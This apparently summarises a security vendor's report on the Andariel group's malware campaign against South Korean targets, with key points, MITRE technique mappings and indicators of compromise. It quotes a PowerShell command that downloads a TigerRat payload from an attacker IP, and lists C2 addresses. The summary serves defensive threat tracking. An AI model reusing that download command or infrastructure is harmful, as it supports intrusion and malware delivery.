The article traces the Andariel group’s malware campaign distributed via an asset management program, tying the group to Lazarus and detailing their use of Log4Shell and other vulnerabilities to attack South Korean targets. It also covers the Go-based downloader, multiple backdoors (TigerRat, Lilith RAT, Black RAT, NukeSped variants), MS-SQL Server exploitation, and persistence techniques such as scheduled tasks and concealed user accounts.
#AndarielGroup #TigerRat
#AndarielGroup #TigerRat
Keypoints
- Andariel is linked to Lazarus and has shifted toward financially motivated attacks in addition to information gathering.
- Initial access often involves spear phishing, watering hole, or supply chain attacks, with cases exploiting a central management solution.
- Recent activity includes exploiting vulnerabilities in Log4Shell and Innorix Agent to target South Korean sectors.
- An asset management program was used in the latest operation, alongside attacks against poorly managed MS-SQL servers.
- Malware deployed includes TigerRat, NukeSped variants, Black RAT, and Lilith RAT (open-source), plus a Go-based downloader.
- Post-infection actions include privilege escalation (PrintSpoofer), creating concealed user accounts, persistence via scheduled tasks, and credential discovery with NirSoft tools.
- Security guidance emphasizes patching, monitoring asset management software, and updating security products to detect and block these threats.
MITRE Techniques
- [T1566.001] Phishing – Used spear phishing as an initial access method. “[The Andariel group usually launches spear phishing, watering hole, or supply chain attacks for initial penetration.]”
- [T1195] Supply Chain Compromise – Attack via an asset management program used to distribute malware. “[Andariel group distributing malware via an attack using a certain asset management program.]”
- [T1203] Exploitation for Client Execution – Exploited vulnerabilities such as Log4Shell to attack targets. “[exploiting vulnerabilities in many programs such as Log4Shell and Innorix Agent to attack targets in various corporate sectors…]”
- [T1110] Brute Force – Targeted poorly managed MS-SQL servers with credentials vulnerable to brute force/dictionary attacks. “[the threat actor attacked poorly managed MS-SQL servers and installed NukeSped… vulnerable against brute force or dictionary attacks]”
- [T1059.001] PowerShell – Downloaded malware using a PowerShell command. “[PowerShell command: wget hxxp://109.248.150[.]147:8585/load.png -outfile C:Userspubliccredis.exe]”
- [T1218.005] Signed Binary Proxy Execution – Used the mshta.exe process to download malware. “[the group also used the mshta.exe process to download malware.]”
- [T1053.005] Scheduled Task – Maintained persistence by registering tasks in Task Scheduler. “[ran the following commands and registered them to the task scheduler to maintain persistence.]”
- [T1003] Credential Dumping – Used NirSoft tools to reveal saved credentials for lateral movement. “[NirSoft’s CredentialsFileVIew and Network Password Recovery… can be used in the future for lateral movement within the organization’s network]”
- [T1136.001] Create Account – Added a hidden user account for persistence and GUI access. “[the threat actor also added a user account in the system and concealed it.]”
Indicators of Compromise
- [IP Address] context – 109.248.150.147:443, 27.102.115.207:8088, and 2 more items
- [MD5 Hash] context – 13b4ce1fc26d400d34ede460a8530d93: TigerRat (credisvs.exe, credis.exe), 41895c5416fdc82f7e0babc6bb6c7216: TigerRat (credis.exe)
- [URL] context – hxxp://109.248.150[.]147:8585/load.png, hxxp://27.102.118[.]204:6099/fav.ico
- [File Name] context – credis.exe, mltest.exe, and 2 more file names
- [C2 URL] context – 84.38.132[.]67:8443, 109.248.150[.]147:8443
Read more: https://asec.ahnlab.com/en/59073/